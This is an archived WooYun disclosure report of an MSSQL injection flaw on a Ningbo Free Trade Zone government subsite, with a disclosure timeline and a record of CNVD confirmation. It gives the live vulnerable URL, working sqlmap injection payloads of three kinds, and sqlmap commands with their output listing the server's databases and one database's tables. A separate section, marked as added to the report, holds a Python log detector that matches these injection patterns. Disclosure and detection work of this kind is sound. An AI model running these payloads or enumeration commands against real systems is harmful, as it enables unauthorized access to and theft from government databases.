WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
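2014-06-05: Details reported to the vendor; awaiting vendor handling
2014-06-09: Vendor confirmed; details disclosed to the vendor only
2014-06-19: Details disclosed to core white hats and experts in related fields
2014-06-29: Details disclosed to regular white hats
2014-07-09: Details disclosed to intern white hats
2014-07-23: Details disclosed to the public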
Ningbo Free Trade Zone subsite #MSSQL Injection
MSSQL injection URL:
http://ldap.nftz.gov.cn/~test/lad/client/read.php?id=1000
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1000) AND 4763=4763 AND (2649=2649

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1000) AND 4704=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(102)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (4704=4704) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(100)+CHAR(99)+CHAR(104)+CHAR(113))) AND (6117=6117

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=1000) UNION ALL SELECT CHAR(113)+CHAR(111)+CHAR(102)+CHAR(100)+CHAR(113)+CHAR(116)+CHAR(76)+CHAR(113)+CHAR(115)+CHAR(88)+CHAR(112)+CHAR(88)+CHAR(111)+CHAR(89)+CHAR(101)+CHAR(113)+CHAR(100)+CHAR(99)+CHAR(104)+CHAR(113),NULL,NULL,NULL,NULL-- 
---
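Added example (not part of the original report, and not the site's own code): a log-review check that flags requests to read.php whose id parameter is not a plain integer and names which of the patterns from the sqlmap output above it contains. The access-log format, the client address and the rule that id is a short decimal integer are assumptions; the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Patterns taken from the three techniques in the sqlmap output above.
SIGNATURES = {
    "boolean tautology": re.compile(r"\bAND\s+\(?\s*(\d+)\s*=\s*\1\b", re.I),
    "error-based CONVERT": re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I),
    "UNION SELECT": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "CHAR() concatenation": re.compile(r"(?:CHAR\(\d+\)\s*\+\s*){3,}", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
PLAIN_ID = re.compile(r"\d{1,10}")  # assumption: id is a short decimal integer


def classify(log_line):
    """Return the signature names matched by the id parameter of one log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    hits = []
    query = urlsplit(m.group(1)).query
    for value in parse_qs(query, keep_blank_values=True).get("id", []):
        if PLAIN_ID.fullmatch(value):
            continue  # the only shape the parameter should ever have
        hits.append("non-integer id")
        hits += [name for name, rx in SIGNATURES.items() if rx.search(value)]
    return hits


def sample_line(id_value):
    """Build a constructed access-log line (documentation IP, assumed format)."""
    encoded = quote(id_value, safe="")
    return ('203.0.113.5 - - [05/Jun/2014:10:00:00 +0800] '
            '"GET /~test/lad/client/read.php?id=' + encoded + ' HTTP/1.1" 200 512')


# Constructed samples: one normal request and the boolean-based payload above.
SAMPLE_IDS = ["1000", "1000) AND 4763=4763 AND (2649=2649"]

if __name__ == "__main__":
    for value in SAMPLE_IDS:
        print(classify(sample_line(value)) or "clean", "<-", value)
```

The same integer-only rule, enforced in read.php before the value reaches a parameterized query, rejects all three payload types listed above.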
#1. Enumerate the databases:
sqlmap -u http://ldap.nftz.gov.cn/~test/lad/client/read.php?id=1000 --dbs
available databases [33]:
[*] baosuiqu
[*] bsqgh
[*] cyzx
[*] drc_nftz_gov_cn
[*] g共青团员教育活动
[*] jbook
[*] jcms24_2
[*] jgjwebdb2005
[*] lmnew
[*] master
[*] model
[*] msdb
[*] network
[*] new_oa
[*] nftz_cnhr_db
[*] nftz_cy_db
[*] nftz_djw_db
[*] nftz_floor
[*] nftz_gov_cn_en_db
[*] nftz_lbw_db
[*] nftzhr
[*] nftzoa_file
[*] Northwind
[*] pdmis_v2
[*] pubs
[*] qy_dfxt
[*] tempdb
[*] vipchat
[*] webmng
[*] WebOA_ZXTOP
[*] wzyw
[*] yq_album
#2. Enumerate the tables:
sqlmap -u http://ldap.nftz.gov.cn/~test/lad/client/read.php?id=1000 -D baosuiqu --tables
Database: baosuiqu
[18 tables]
+----------------+
| Images         |
| data_sjzd      |
| dtproperties   |
| elects         |
| infocenter     |
| product        |
| submenu        |
| sysconstraints |
| syssegments    |
| system_user    |
| user_qx        |
| victory        |
| votes          |
| web_count      |
| web_link       |
| web_wshd_wsdc  |
| web_wshd_wsdc  |
| web_zhaopin    |
+----------------+
:)
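Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-06-09 23:02
CNVD confirmed and reproduced the situation described; it has been passed to CNCERT for dispatch to the Zhejiang sub-center for handling.
None at this time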